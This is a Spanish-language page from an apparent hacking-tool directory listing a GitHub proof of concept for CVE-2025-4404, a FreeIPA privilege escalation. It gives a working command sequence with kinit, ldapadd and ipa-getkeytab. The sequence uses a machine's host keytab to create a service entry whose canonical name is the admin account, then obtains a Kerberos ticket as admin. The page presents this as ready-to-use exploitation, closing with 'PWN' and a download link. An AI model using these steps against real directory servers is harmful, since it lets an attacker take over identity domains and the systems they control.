Skip to content
KitploitKITPLOIT
HerramientasBlog
Log in
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

FeedsContactoPrivacidad© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2025-4404-POC — PoC para CVE-2025-4404 | Kitploit
Herramientas/GitHubGitHub/im10n/cve-2025-4404-poc
Escalada de PrivilegiosAnálisis de VulnerabilidadesExplotaciónPruebas de PenetraciónAutenticación
GitHubim10n/cve-2025-4404-poc

CVE-2025-4404-POC

PoC para CVE-2025-4404

Ver Repositorio
616hace 1 añoAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2025-4404 POC

POC para CVE-2025-4404

Si tienes una cuenta de equipo del dominio (host/pc1.[email protected]), puedes añadir el servicio por defecto. Y puedes establecer krbPrincipalName y krbCanonicalName. Por defecto, el valor del atributo krbCanonicalName no está presente en la cuenta de administrador de FreeIPA 4.12.4. Puedes solicitar un ticket de Kerberos con el valor krbPrincipalName, pero el ticket contendrá el valor krbCanonicalName.

¡Vamos!

  1. Primero, solicitaremos un ticket en nombre de la cuenta del equipo: $ kinit host/[email protected] -k -t /etc/krb5.keytab

  2. Añadir a la cuenta de servicio LDAP:

$ ldapadd -H ldap://dc1.test.local
dn: krbprincipalname=test/[email protected],cn=services,cn=accounts,dc=test,dc=local
ipaKrbPrincipalAlias: test/[email protected]
krbPrincipalName: test/[email protected]
objectClass: ipaKrbPrincipal
objectClass: ipaObject
objectClass: ipaService
objectClass: krbPrincipal
objectClass: krbPrincipalAux
objectClass: top
krbCanonicalName: [email protected]
managedBy: fqdn=pc1.test.local,cn=computers,cn=accounts,dc=test,dc=local
  1. Solicitar keytab
$ ipa-getkeytab -p test/[email protected] -k ./test.keytab --mech=GSSAPI
$ kdestroy -A
  1. Solicitar ticket $ kinit --no-request-pac -k -t ./test.keytab test/[email protected]

¡¡¡PWN!!!

Puedes comprobar el ticket con: ldapwhoami -H ldap://dc1.test.local

Descargar herramienta